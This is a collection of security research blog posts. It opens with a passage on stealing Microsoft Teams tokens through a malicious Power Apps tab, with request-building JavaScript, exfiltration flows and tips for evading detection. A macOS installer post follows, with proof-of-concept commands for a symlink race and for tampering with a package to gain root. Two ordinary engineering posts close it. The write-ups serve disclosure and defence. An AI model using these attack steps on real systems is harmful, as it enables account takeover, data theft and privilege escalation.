Some of these tokens will become useful to us for constructing a larger attack (specifically the graph.microsoft.com and apihub.azure.com tokens).
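Sketched in javascript, the empty POST from earlier might be built like this (the environment id format and the use of the stolen token as a Bearer Authorization header are assumptions on our part):

```javascript
// Build the onBehalfOfTokenBundle request described above. The endpoint path
// is from the article; the auth header format is assumed for illustration.
function buildTokenBundleRequest(environmentId, flowToken) {
  return {
    url: "https://api.flow.microsoft.com/providers/Microsoft.ProcessSimple" +
      "/environments/" + environmentId +
      "/users/me/onBehalfOfTokenBundle?api-version=2021-01-03",
    options: {
      method: "POST",
      headers: { Authorization: "Bearer " + flowToken },
    },
  };
}

// Usage from the malicious tab (network call not made here):
// const { url, options } = buildTokenBundleRequest(envId, stolenToken);
// const bundle = await (await fetch(url, options)).json();
```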

Creating connectors and using first party logins

To create flows which let us take control of the victim’s services, we first need to create connectors for those services.

When a connector is created, a user can use a consent link to login via a login.microsoft.com popup and grant permissions for the service for which the connector is being made (like Office 365, Teams, or Sharepoint). Some connectors, however, come with a first party login url, which lets us bypass the regular interactive login process and authorize the connector using only the authorization tokens already gathered.

Creating a connector on the victim’s behalf takes only three requests, the final of which is a POST request to the first party login url, with the apihub.azure.com access token.

consenting to a connector with a stolen apihub.azure.com token

After this third request, the connector will be ready to use with any flow we create.

Creating a flow

Given the number of potential connector types, flow triggers, and actions we can perform, there are countless ways that we could leverage this access. They range anywhere from simply forwarding every email which is received by the victim to the attacker, to only performing actions if a particular RSS feed updates, to creating REST endpoints that let us trigger any number of different actions in different services.

Additionally, if the organization happens to have premium Power Apps/Automate licensing, there are many more options available. It is honestly a very useful system (even if you’re not trying to exploit a whole Office 365 org).

For our attack, we will look at creating a flow which gives us access to endpoints which take JSON input, and perform the actions we want (send emails, Teams messages, download files, etc.). It is a noisier method, since it requires the attacker to send requests (authenticated as themselves), but it is convenient for demonstration. Not all flows require the attacker to be authenticated, or require user interaction.

Choosing flow triggers

A flow trigger is how a flow will be kicked off / knows when to begin. The three main types are automatic (when an email comes in, forward it to this address), instant (when a request is received at this endpoint, trigger the flow), and scheduled (run the flow every xyz seconds/minutes/hours).

The flow trigger we would prefer to use is the “when an HTTP request is received” trigger, which lets unauthenticated users trigger the flow, but that is a premium feature, so instead we will use the “Manually Trigger a Flow” trigger.

The trigger for our Microsoft Teams flow

This trigger requires authentication, but because it is assumed that the attacker is part of the organization this shouldn’t be a problem, and there are ways to limit information about who is running what flows.

Creating the flow logic

Flows allow you to create an automated process piece by piece, passing the outputs of one action to the next. For example, in the flow we created to let us get all Teams messages from a user, as well as send messages to any channel on their behalf, we determine what action to take, who to send the message to and other details depending on the input passed to the trigger.

Sending a message is quick and simple, but to retrieve all messages for all teams and channels, we first grab a list of all teams, then get each channel per team, then all messages per channel, and roll it up into one big gross ball and have the flow send it to the attacker via email.

The Teams flow for our PoC

Now that we have the flow created, we need to know how to create it and share it with ourselves as the attacker using the tokens we’ve stolen, and what those requests look like. Luckily, in our case it is just a couple of simple requests.

  1. A POST request, containing a JSON object representing the flow, to create it and get the unique flow name.
  2. A GET request to grab the flow trigger uri, which will let us trigger the flow as the attacker once we have added ourselves to the owners group.
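The body of that first POST is a JSON definition of the flow itself. A heavily trimmed sketch of what such a definition could look like (the schema and field names here are assumptions, loosely based on the Logic Apps workflow definition language that flows use):

```javascript
// Hypothetical, trimmed flow definition: a manual (button) trigger plus one
// "send an email" action through a previously consented Office 365 connection.
function buildFlowDefinition(connectionName) {
  return {
    properties: {
      displayName: "Quarterly Report Sync", // innocuous-looking name
      definition: {
        triggers: {
          manual: { type: "Request", kind: "Button" },
        },
        actions: {
          Send_an_email: {
            type: "ApiConnection",
            inputs: {
              host: { connectionName: connectionName },
              method: "post",
              body: {
                To: "@triggerBody()?['to']",
                Subject: "@triggerBody()?['subject']",
                Body: "@triggerBody()?['body']",
              },
            },
          },
        },
      },
    },
  };
}
```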

Adding a group to flow owners

For the trigger we chose, we need to be able to access the flow trigger uri, which can only be done by users who have access to the flow. As a result, we need to add a group we belong to (which seems less suspicious than just adding ourselves) to the flow owners.

The easiest choice here is some large, all-encompassing group, but in our case we’re using the group which is generated automatically for any team created in Microsoft Teams.

In order to grab the unique group id, we use the graph.microsoft.com token we stole from the victim earlier. We then modify the flow’s owners to include that group.

adding a group to the flow owners

Running the flow and sending ourselves the uris we need

In the proof of concept we’re building, we create a flow that lets us send emails on behalf of the victim user. This can be leveraged at the end of the attack to send ourselves the list of the flow trigger uris we need in order to perform the actions we want.

sending an email using the Outlook connector and flow we’ve created

For example, at the end of the email/Teams proof of concept we’re building, an email is sent on the victim’s behalf which sends us the flow trigger uris for both the Outlook and Teams flows we’ve created.

The message we receive from the victim with the flow trigger uris

Using these flow trigger uris, we can now read the victim’s emails and Teams messages, and send messages and emails on their behalf (despite being authenticated as Bad User).

Putting it all together

The “TL;DR” shot: actions the malicious tab performs on opening

There are a number of ways in which we could build an attack with this vulnerability. It is likely that the best way would be to only use javascript on the malicious tab to steal the service.flow.microsoft.com token, and then perform the rest of the actions from an attacker-controlled server, so we reduce the traffic being generated by the victims and aren’t cut off by them navigating away from the tab.

For our quick and dirty PoC however, we just perform the whole attack with one big javascript section in our malicious tab. The pseudocode for our attack looks like this:
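Roughly, that pseudocode can be reconstructed from the steps described in the previous sections as (a hedged reconstruction; function names are placeholders, not real API calls):

```
token       = stealServiceFlowTokenViaPostMessage()
bundle      = getTokenBundle(token)                  // api.flow.microsoft.com
for service in [office365, teams]:
    connector = createConnector(service, bundle.apihub)
    consentWithFirstPartyLogin(connector, bundle.apihub)
emailFlow   = createFlow(sendEmailDefinition)
teamsFlow   = createFlow(teamsMessagesDefinition)
groupId     = lookupTeamGroupId(bundle.graph)        // graph.microsoft.com
addToFlowOwners([emailFlow, teamsFlow], groupId)
triggerUris = getFlowTriggerUris([emailFlow, teamsFlow])
runFlow(emailFlow, { to: attackerAddress, body: triggerUris })
```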

Setting up a malicious tab with a payload like the one above will cause the victim to create connectors and flows, and add the attacker as an owner to them, as well as send them an email containing the flow trigger uris.

As a real example, here is a quick clip of a similar payload running and sending the attacker the victim’s Teams messages, and letting the attacker send a message to a private team masquerading as the victim.

stealing and sending Teams messages

Considerations for the attacker

If you’ve gone through the above and thought “cool, but it would be really easy for an admin to determine who is using these flows maliciously,” you’d be correct. However, there are a number of steps one could take to limit the exposure of the attacking user if a similar attack is being carried out in a penetration test.

  • Flows allow you to specify whether the inputs and outputs to each action should be kept secret / scrubbed from the flow’s run history. This means that it would be harder to observe what data is being taken, and where it is being sent.
  • Not all flows require the user to make authenticated requests to trigger. Low and slow methods are available, like having flows trigger on an RSS feed update (30 minute minimum period), on a schedule, or automatically (for example, when a new email comes in from any account, read the email body and perform those actions).
  • Running the attack as one long javascript payload isn’t ideal and takes too long in real situations. Just grabbing the service.flow.microsoft.com token and conducting the rest of the attack from an attacker-controlled machine would be much less conspicuous.
  • Flows can be used to creatively cover an attacker’s tracks. For example, if you exfiltrate data via email in a flow, you can add a final step which deletes any emails sent to the attacker’s mail from the Sent Items folder.

Considerations for org administrators

While it may be difficult to determine who in a team has set up a malicious tab, or what user is running the flows (if the inputs/outputs have been made secret), there is a potential indicator to identify whether a user has had malicious flows run on their behalf.

When a user logs into make.powerapps.com or flow.microsoft.com to create a flow, a Microsoft Power Automate free license is automatically added to their set of licenses (if they didn’t already have one assigned to them). However, when flows are created on a user’s behalf by a malicious tab, they don’t have the license assigned to them. This license status can be cross-referenced with which users have flows created under their name at admin.powerplatform.microsoft.com.

organization admin portal

Notice that Bad User has logged into the flow.microsoft.com web interface, but Good User, despite having flows in their name listed in admin.powerplatform.microsoft.com, does not show as having a license for Power Automate. This could indicate that the flows were not created intentionally by Good User.

Luckily, the attack is limited to authenticated users within a Teams organization who have the ability to create Power Apps tabs, which means it can’t just be exploited by an untrusted/unauthenticated attacker. However, the permission to create these tabs is enabled by default, so it may be a good idea to consider limiting apps by default and enabling them on request.

Takeaways

While that was a long and not quite straightforward attack, the potential impact of such an attack could be huge, especially if it happens to hit an organization administrator. That such a small initial bug (the improper validation of the make.powerapps.com domain) could be traded up until an attacker is exfiltrating emails, Teams messages, OneDrive and SharePoint files is definitely concerning. It means that even a small bug in a not-so-common service like Microsoft Power Apps could lead to the compromise of many other services by way of token bundles and first party logins for connectors.

So if you happen to find a small bug in one service, see how far you can take it and see if you can trade a small bug for a big impact. There are likely other creative and serious potential attacks we didn’t explore with all of the potential access tokens we were able to steal. Let me know if you spot one 🙂.

Thanks for reading!


Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

More macOS Installer Flaws

3 June 2021 at 13:02

Back in December, we wrote about attacking macOS installers. Over the last couple of months, as my team looked into other targets, we kept an eye on the installers of applications we were using and interacting with regularly. During our research, we noticed yet another of the aforementioned flaws in the Microsoft Teams installer and in the process of auditing it, discovered another generalized flaw with macOS package installers.

Frustrated by the prevalence of these issues, we decided to write them up and make separate reports to both Apple and Microsoft. We wrote to Apple to recommend implementing a fix similar to what they did for CVE-2020-9817 and explained the additional LPE mechanism discovered. We wrote to Microsoft to recommend a fix for the flaw in their installer.

Both companies have rejected these submissions and suggestions. Below you will find full explanations of these flaws as well as proofs-of-concept that can be integrated into your existing post-exploitation arsenals.

Attack Surface

To recap from the previous blog, macOS installers have a variety of convenience features that allow developers to customize the installation process for their applications. Most notable of these features are preinstall and postinstall scripts. These are scripts that run before and after the actual application files are copied to their final destination on a given system.

If the installer itself requires elevated privileges for any reason, such as setting up a system-level Launch Daemon for an auto-updater service, the installer will prompt the user for permission to elevate privileges to root. There is also the case of unattended installations automatically doing this, but we will not be covering that in this post.

The primary issue being discussed here occurs when these scripts — running as root — read from and write to locations that a normal, lower-privileged user has control over.

Issue 1: Usage of Insecure Directories During Elevated Installations

In July 2020, NCC Group posted their advisory for CVE-2020-9817. In this advisory, they discuss an issue where files extracted to Installer Sandbox directories retained the permissions of a lower-privileged user, even when the installer itself was running with root privileges. This means that any local attacker (local for code execution, not necessarily physical access) could modify these files and potentially escalate to root privileges during the installation process.

NCC Group conceded that these issues could be mitigated by individual developers, but chose to report the issue to Apple to suggest a more holistic solution. Apple appears to have agreed, provided a fix in HT211170, and assigned a CVE identifier.

Apple’s solution was simple: They modified files extracted to an installer sandbox to obtain the permissions of the user the installer is currently running as. This means that lower privileged users would not be able to modify these files during the installation process and influence actions performed by root.

Similar to the sandbox issue, as noted in our previous blog post, it isn’t uncommon for developers to use other less-secure directories during the installation process. The most common directories we’ve come across that fit this bill are /tmp and /Applications, which both have read/write access for standard users.

Let’s use Microsoft Teams as yet another example of this. During the installation process for Teams, the application contents are moved to /Applications as normal. The postinstall script creates a system-level Launch Daemon that points to the TeamsUpdaterDaemon application (/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon), which will run with root permissions. The issue is that if a local attacker is able to create the /Applications/Microsoft Teams directory tree prior to installation, they can overwrite the TeamsUpdaterDaemon application with their own custom payload during the installation process, which will be run as a Launch Daemon, and thus give the attacker root permissions. This is possible because while the installation scripts do indeed change the write permissions on this file to root-only, creating this directory tree in advance thwarts this permission change because of the open nature of /Applications.

The following demonstrates a quick proof of concept:

# Prep Steps Before Installing
/tmp ❯❯❯ mkdir -p "/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/"
# Just before installing, have this running. Inelegant, but it works for demonstration purposes.
# Payload can be whatever. It won't spawn a GUI, though, so a custom dropper or other application would be necessary.
/tmp ❯❯❯ while true; do
ln -f -F -s /tmp/payload "/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon";
done
# Run installer. Wait for the TeamsUpdaterDaemon to be called.

The above creates a symlink to an arbitrary payload at the file path used in the postinstall script to create the Launch Daemon. During the installation process, this directory is owned by the lower-privileged user, meaning they can modify the files placed here for a short period of time before the installation scripts change the permissions to allow only root to modify them.

In our report to Microsoft, we recommended verifying the integrity of the TeamsUpdaterDaemon prior to creating the Launch Daemon entry or using the preinstall script to verify permissions on the /Applications/Microsoft Teams directory.

The Microsoft Teams vulnerability triage team has been met with criticism over their handling of vulnerability disclosures these last couple of years. We’d expected that their recent inclusion in Pwn2Own showcased vast improvements in this area, but unfortunately, their communications in this disclosure as well as other disclosures we’ve recently made regarding their products demonstrate that this is not the case.

Full thread: https://mobile.twitter.com/EyalItkin/status/1395278749805985792
Full thread: https://twitter.com/mattaustin/status/1200891624298954752
Full thread: https://twitter.com/MalwareTechBlog/status/1254752591931535360

In response to our disclosure report, Microsoft stated that this was a non-issue because /Applications requires root privileges to write to. We pointed out that this was not true and that if it was, it would mean the installation of any application would require elevated privileges, which is clearly not the case.

We received a response stating that they would review the information again. A few days later our ticket was closed with no reason or response given. After some prodding, the triage team finally stated that they were still unable to confirm that /Applications could be written to without root privileges. Microsoft has since stated that they have no plans to release any immediate fix for this issue.

Apple’s response was different. They stated that they did not consider this a security concern and that mitigations for this sort of issue were best left up to individual developers. While this is a totally valid response and we understand their position, we requested information regarding the difference in treatment from CVE-2020-9817. Apple did not provide a reason or explanation.

Issue 2: Bypassing Gatekeeper and Code Signing Requirements

During our research, we also discovered a way to bypass Gatekeeper and code signing requirements for package installers.

According to Gatekeeper documentation, packages downloaded from the internet or created from other possibly untrusted sources are supposed to have their signatures validated and a prompt is supposed to appear to authorize the opening of the installer. See the following quote for Apple’s explanation:

When a user downloads and opens an app, a plug-in, or an installer package from outside the App Store, Gatekeeper verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn’t been altered. Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.

In the case of downloading a package from the internet, we can observe that modifying the package will trigger an alert to the user upon opening it claiming that it has failed signature validation due to being modified or corrupted.

Failed signature validation for a modified package

If we duplicate the package and modify it, however, we can modify contained files at will and repackage it sans signature. Most users will not notice that the installer is no longer signed (the lock symbol in the upper right-hand corner of the installer dialog will be missing) since the remainder of the assets used in the installer will look as expected. This newly modified package will also run without being caught or validated by Gatekeeper (Note: The applications installed will still be checked by Gatekeeper when they are run post-installation. The issue presented here regards the scripts run by the installer.) and could allow malware or some other malicious actor to achieve privilege escalation to root. Additionally, this process can be completely automated by monitoring for .pkg downloads and abusing the fact that all .pkg files follow the same general format and structure.

The below instructions can be used to demonstrate this process using the Microsoft Teams installer. Please note that this issue is not specific to this installer/product and can be generalized and automated to work with any arbitrary installer.

To start, download the Microsoft Teams installation package here: https://www.microsoft.com/en-us/microsoft-teams/download-app#desktopAppDownloadregion

When downloaded, the binary should appear in the user’s Downloads folder (~/Downloads). Before running the installer, open a Terminal session and run the following commands:

# Rename the package
yes | mv ~/Downloads/Teams_osx.pkg ~/Downloads/old.pkg
# Extract package contents
pkgutil --expand ~/Downloads/old.pkg ~/Downloads/extract
# Modify the post installation script used by the installer
mv ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
echo "#!/usr/bin/env sh\nid > ~/Downloads/exploit\n$(cat ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak)" > ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm -f ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
chmod +x ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
# Repackage and rename the installer as expected
pkgutil -f --flatten ~/Downloads/extract ~/Downloads/Teams_osx.pkg

When a user runs this newly created package, it will operate exactly as expected from the perspective of the end-user. Post-installation, however, we can see that the postinstall script run during installation has created a new file at ~/Downloads/exploit that contains the output of the id command as run by the root user, demonstrating successful privilege escalation.

Demo of above proof of concept

When we reported the above to Apple, this was the response we received:

Based on the steps provided, it appears you are reporting Gatekeeper does not apply to a package created locally. This is expected behavior.

We confirmed that this is indeed what we were reporting and requested additional information based on the Gatekeeper documentation available:

Apple explained that their initial explanation was faulty, but maintained that Gatekeeper acted as expected in the provided scenario.

Essentially, they state that locally created packages are not checked for malicious content by Gatekeeper nor are they required to be signed. This means that even packages that require root privileges to run can be copied, modified, and recreated locally in order to bypass security mechanisms. This allows an attacker with local access to man-in-the-middle package downloads and escalate privileges to root when a package that does so is executed.

Conclusion and Mitigations

So, are these flaws actually a big deal? From a realistic risk standpoint, no, not really. This is just another tool in an already stuffed post-exploitation toolbox. It should be noted, though, that similar installer-based attack vectors are actively being exploited, as is the case in recent SolarWinds news.

From a triage standpoint, however, this is absolutely a big deal for a couple of reasons:

  1. Apple has put so much effort over the last few iterations of macOS into baseline security measures that it seems counterproductive to their development goals to ignore basic issues such as these (especially issues they’ve already implemented similar fixes for).
  2. It demonstrates how much emphasis some vendors place on making issues go away rather than solving them.

We understand that vulnerability triage teams are absolutely bombarded with half-baked vulnerability reports, but becoming unresponsive during the disclosure response, overusing canned messaging, or simply giving incorrect reasons should not be the norm and highlights many of the frustrations researchers experience when interacting with these larger organizations.

We want to point out that we do not blame any single organization or individual here and acknowledge that there may be bigger things going on behind the scenes that we are not privy to. It’s also totally possible that our reports or explanations were hot garbage and our points were not clearly made. In either case, though, communications from the vendors should have been better about what information was needed to clarify the issues before they were simply discarded.

Circling back to the issues at hand, what can users do to protect themselves? It’s impractical for everyone to manually audit each and every installer they interact with. The occasional spot check with Suspicious Package, which shows all scripts executed when an installer package is run, never hurts. In general, though, paying attention to proper code signatures (look for the lock in the upper right-hand corner of the installer) goes a long way.

For developers, pay special attention to the directories and files being used during the installation process when creating distribution packages. In general, it’s best practice to use an installer sandbox whenever possible. When that isn’t possible, verifying the integrity of files as well as enforcing proper permissions on the directories and files being operated on is enough to mitigate these issues.

Further details on these discoveries can be found in TRA-2021-19, TRA-2021-20, and TRA-2021-21.


More macOS Installer Flaws was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Optimizing 700 CPUs Away With Rust

By: Alan Ning
6 May 2021 at 15:31

In Tenable.io, we are heavy users of Datadog custom metrics. Millions of metrics are sent through Dogstatsd, providing deep insights into the complex platform. As the platform grew, we found that a significant number of metrics sent by legacy apps were obsolete. We tried to hunt down these obsoleted metrics in the codebase, but modifying legacy applications was extremely time consuming and risky.

To address this, we deployed a StatsD filter as a Datadog agent sidecar to filter out unnecessary metrics. The filter is a simple UDP datagram forwarder written in Node.js (sample, not actual code). We chose Node.js because, in our environment, its network performance outstripped that of other languages offering a comparably fast path to production. We were able to implement, test and deploy this change across the entire T.io platform within a week.

statsd-filter-proxy is deployed as a sidecar to datadog-agent, filtering all StatsD traffic prior to DogstatsD.

While this worked for many months, performance issues began to crop up. As the platform continued to scale up, we were sending more and more metrics through the filter. During the first quarter of 2021, we added over 1.4 million new metrics in an effort to improve our observability. The filters needed more CPU resources to keep up with the new metrics. At this scale, even a minor inefficiency can lead to large wastage. Over time, we were consuming over 1000 CPUs and 400GB of memory on these filters. The overhead had become unacceptable.

We analyzed the performance metrics and decided to rewrite the filter in a more efficient language. We chose Rust for its high performance and safety characteristics (see our other post on Rust evaluations). The source code of the new Rust-based filter is available here.

The Rust-based filter is much more efficient than the original implementation. With the ability to fully manage the heap allocations, Rust’s memory allocation for handling each datagram is kept to a minimum. This means that the Rust-based filter only needs a few MB of memory to operate. As a result, we saw a 75% reduction in CPU usage and a 95% reduction in memory usage in production.

Per pod, average CPU usage dropped from 800m to 200m cores.
Per pod, average memory usage dropped from 70MB to 5MB.

In addition to reclaiming compute resources, the latency per packet has also dropped by over 50%. While latency isn’t a key performance indicator for this application, it is rewarding to see that we are running twice as fast for a fraction of the resources.

With this small change, we were able to optimize away over 700 CPU and 300GB of memory. This was all implemented, tested and deployed in a single sprint (two weeks). Once the new filter was deployed, we were able to confirm the resource reduction in Datadog metrics.

CPU / Memory usage dropped drastically following the deployment

Source: https://github.com/tenable/statsd-filter-proxy-rs

TL;DR:

  • Replaced JS-based StatsD filter with Rust and received huge performance improvement.
  • At scale, even a small optimization can result in a huge impact.

Optimizing 700 CPUs Away With Rust was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Scaling Tenable.io — From Site to Cell

By: Alan Ning
4 March 2021 at 15:46

Scaling Tenable.io — From Site to Cell

Since the inception of Tenable.io, keeping up with data pressure has been a continuous challenge. This data pressure comes from two dimensions: the growth of the customer base and the growth of usage from each customer. This challenge has been most notable in Elasticsearch, since it is one of the most important stages in our petabytes-scale SaaS pipeline.

When customers run vulnerability scans, the Nessus scanners upload the scan data to Tenable.io. There, the data is broken down into documents detailing vulnerability information, including data such as asset information and cyber exposure details. These documents are then aggregated into an Elasticsearch index. However, when the index reached the scale of hundreds of nodes per cluster, the team discovered that further horizontal scaling would affect overall stability. We would encounter more hot shard problems, leading to uneven load across the index and affecting the user experience. This post will detail the re-architecture that both solved this scaling problem and achieved massive performance improvements for our customers.

Incremental Scaling from Site to Cell

Tenable.io scales by sites, where each site handles requests for a group of customers.

Each point of presence, called a site, contains a multi-tenant Elasticsearch instance to be used by geographically similar customers. As data pressure increases, however, horizontal scaling will cause instability, which will in turn cause instability at the site level.

To overcome this challenge, our overall strategy was to break out the site-wide (monolith) Elasticsearch cluster into multiple smaller, more manageable clusters. We call these smaller clusters cells. The rule is simple: If a customer has over 100 million documents, they will be isolated into their own cell. Smaller customers will be moved to one of the general population (GP) clusters. We came up with a technique to achieve zero downtime migration with massive performance gains.

Migrate from site to cell, where customers with large datasets may get their own Elasticsearch cluster.

Request Routing and Backfill

To achieve a zero downtime migration, we implemented two key pieces of software:

  1. An Elasticsearch proxy that can:
  • Transparently proxy any Elasticsearch request to any Elasticsearch cluster
  • Intelligently tee any write request (e.g. Index, Bulk) to one or more clusters

  2. A Spark job that can:
  • Query specific customer data
  • Read Spark dataframes from the monolith cluster using parallelized scrolls
  • Write those dataframes from the monolith cluster directly to the cell-based cluster

To start, we reconfigured micro-services to communicate with Elasticsearch through the proxy. Based on the targeted customer (more on this later), the proxy performed dual write to the old monolith cluster and the new cell-based cluster. Once the dual write began, all new documents started flowing to the new cell cluster. For all older documents, we ran a Spark job to pull old data from the monolith cluster to the new cell cluster. Finally, after the Spark job completed, we cut all new queries over to the new cell cluster.

A zero downtime backfill process. Step 1: start dual write. Step 2: Backfill old data. Step 3: Cutover reads.

Elasticsearch Proxy

With the cell architecture, we see a future where migrating customers from one Elasticsearch cluster to another is a common event. Customers in a multi-tenant cluster can easily outgrow the cluster’s capacity over time and require migration to other clusters. In addition, we need to reindex the data from time to time to adjust immutable settings (e.g. shard count). With this in mind, we want to make sure this type of migration is completely transparent to all the micro services. This is why we built a proxy to encapsulate all customer routing logic such that all data allocation is completely transparent to client services.

The Elasticsearch proxy encapsulates all customer routing logic, hiding it from all other services.

For the proxy to be able to route requests to the correct Elasticsearch clusters, it needs the customer ID to be sent along with each request. To achieve this, we injected an X-CUSTOMER-ID HTTP header into each search and index request. The proxy inspected the X-CUSTOMER-ID header in each request, looked up the customer-to-cluster mapping, and forwarded the request on to the correct cluster.
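The per-request routing reduces to a mapping lookup. A sketch in Python, with hypothetical cluster addresses (in production the mapping would live in a dynamic configuration store, not a literal dict):

```python
# Hypothetical customer-to-cluster mapping.
CLUSTER_MAP = {
    "customer-a": "https://es-cell-1.internal:9200",
    "customer-b": "https://es-gp-1.internal:9200",
}
DEFAULT_CLUSTER = "https://es-monolith.internal:9200"

def route_request(headers: dict) -> str:
    """Pick the upstream Elasticsearch cluster from the X-CUSTOMER-ID header."""
    customer_id = headers.get("X-CUSTOMER-ID")
    return CLUSTER_MAP.get(customer_id, DEFAULT_CLUSTER)
```

Customers without an explicit mapping fall through to a default cluster, which is also what makes migrations transparent: moving a customer is just an update to the mapping.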

While search and index requests always target a single customer, a bulk request contains a large number of documents for numerous customers. A single X-CUSTOMER-ID HTTP header would not provide sufficient routing information for the request. To overcome this, we found an interesting hack in Elasticsearch.

A bulk request body is encoded in a newline-delimited JSON (NDJSON) structure. Each action line is an operation to be performed on a document. This is an example directly copied from Elasticsearch documentation:
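(The original post embedded the example as an image; the canonical bulk body from the Elasticsearch reference looks approximately like this.)

```json
{ "index" : { "_index" : "test", "_id" : "1" } }
{ "field1" : "value1" }
{ "delete" : { "_index" : "test", "_id" : "2" } }
{ "create" : { "_index" : "test", "_id" : "3" } }
{ "field1" : "value3" }
{ "update" : { "_id" : "1", "_index" : "test" } }
{ "doc" : { "field2" : "value2" } }
```

Note that index, create and update actions are each followed by a source/doc line, while delete stands alone.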

We found that within an action line, you can append any amount of metadata to the line as long as it is outside the action body. Elasticsearch seems to accept the request and ignore the extra content with no side effects (verified with ES2 to ES7). With this technique, we modified all clients of the Summary index to append customer IDs to every action.

With this modification, the proxy has enough information to break down a bulk request into subrequests for each customer.
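A simplified sketch of that breakdown, assuming the customer ID is carried as an extra `customer_id` key on each action line (the exact key name used in production is not given in the post):

```python
import json
from collections import defaultdict

def split_bulk_by_customer(body: str) -> dict:
    """Split an NDJSON bulk body into one bulk body per customer.

    Assumes each action line carries a customer_id key alongside the
    operation, e.g. {"index": {"_index": "summary"}, "customer_id": "c42"}.
    The extra key is stripped before forwarding.
    """
    lines = [line for line in body.split("\n") if line]
    per_customer = defaultdict(list)
    i = 0
    while i < len(lines):
        action = json.loads(lines[i])
        customer = action.pop("customer_id", None)
        op = next(iter(action))  # index, create, update or delete
        chunk = [json.dumps(action)]
        i += 1
        if op != "delete":  # these ops are followed by a source/doc line
            chunk.append(lines[i])
            i += 1
        per_customer[customer].extend(chunk)
    # Bulk bodies must end with a newline.
    return {c: "\n".join(ls) + "\n" for c, ls in per_customer.items()}
```

Each resulting sub-body can then be forwarded to that customer's cluster exactly like any other bulk request.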

Spark Backfill

To backfill old data after dual writes were enabled, we used AWS EMR with the elasticsearch-hadoop SDK to perform parallel scrolls against every shard from the source index. As Spark retrieves the data in the Resilient Distributed Dataset (RDD) format, the same RDD can be written directly to the destination index. Since we’re backfilling old data, we want to make sure we don’t overwrite anything that’s already been written. To accomplish this, we set es.write.operation to “create”. (Look for an upcoming blog post about how Tenable uses Kotlin with EMR and Spark!)

Here’s some high level sample code:
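(The original post embedded the sample as an image.) A hypothetical PySpark sketch of the same flow using the elasticsearch-hadoop connector — the cluster addresses, index name, and query shape are illustrative, not the actual job:

```python
def backfill_conf(customer_id: str, nodes: str) -> dict:
    # elasticsearch-hadoop settings: scroll the source index for one customer,
    # and only "create" documents so dual-written docs are never overwritten.
    return {
        "es.nodes": nodes,
        "es.query": '{"query": {"term": {"customer_id": "%s"}}}' % customer_id,
        "es.write.operation": "create",
    }

def run_backfill(spark, customer_id: str) -> None:
    conf = backfill_conf(customer_id, "es-monolith.internal:9200")
    # Parallelized scrolls: the connector creates one partition per shard.
    df = (spark.read.format("org.elasticsearch.spark.sql")
          .options(**conf)
          .load("summary"))
    (df.write.format("org.elasticsearch.spark.sql")
       .option("es.nodes", "es-cell-1.internal:9200")
       .option("es.write.operation", "create")
       .save("summary"))
```

The "create" write operation is what makes the backfill idempotent alongside the live dual writes: any document that already exists in the cell cluster is simply rejected rather than clobbered.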

To optimize the backfill performance, we performed steps similar to the ones taken by Soundcloud. Specifically, we found the following settings the most impactful:

  • Setting the index replica to 0
  • Setting the refresh interval to 5 minutes
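Applied through the index settings API, those two tweaks look roughly like this (the index name is illustrative):

```json
PUT /summary/_settings
{
  "index": {
    "number_of_replicas": 0,
    "refresh_interval": "5m"
  }
}
```

Both settings trade durability and search freshness for indexing throughput, which is acceptable during a backfill and reverted once it completes.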

However, since we are migrating data using a live production system, our primary goal is to minimize performance impact. In the end, we settled on indexing 9000 documents per second as the sweet spot. At this rate, migrating a large customer takes 10–20 hours, which is fast enough for this effort.

Performance Improvement

Since we started this effort, we have noticed drastic performance improvements. Elasticsearch scroll speed saw up to a 15X improvement, and query latency decreased by up to several orders of magnitude.

The chart below shows a large scroll request that goes through millions of vulnerabilities. Prior to the cell migration, it could take over 24 hours to run the full scroll. The scroll on the monolith cluster suffered slow performance due to frequent resource contention with other customers, and was further slowed by our fairness algorithm’s throttling. After the customer was migrated to the cell cluster, the same scroll request completed in just over 1.5 hours. Not only is this a large improvement for this customer; other customers also reap the benefits of the decreased contention.

In Summary

Our change in scaling strategy has resulted in large performance improvements for the Tenable.io platform. The new request routing layer and backfill process gave us powerful new tools to shard customer data. Resharding is now a streamlined, safe, zero downtime operation.

Overall, the team is thrilled with the end result. It took a lot of ingenuity, dedication, and teamwork to execute a zero downtime migration of this scale.

tl;dr:

  • Exponential customer growth on the Tenable.io platform led to a huge increase in the data stored in a monolithic Elasticsearch cluster to the point where it was becoming a challenge to scale further with the existing architecture.
  • We broke down the site monolith cluster to cell clusters to improve performance.
  • We migrated customer data through a custom proxy and Spark job, all with zero downtime.
  • Scroll performance improved by 15x, and query latency dropped by several orders of magnitude.

Brought to you by the Sharders team:
Alan Ning, Alex Barbour, Ciaran Gaffney, Jagan Kondapalli, Johnny Mao, Shannon Prickett, Ted O’Meara, Tristan Burch

Special thanks to Jack Matheson and Vincent Gilcreest for all the help with editing.


Scaling Tenable.io — From Site to Cell was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
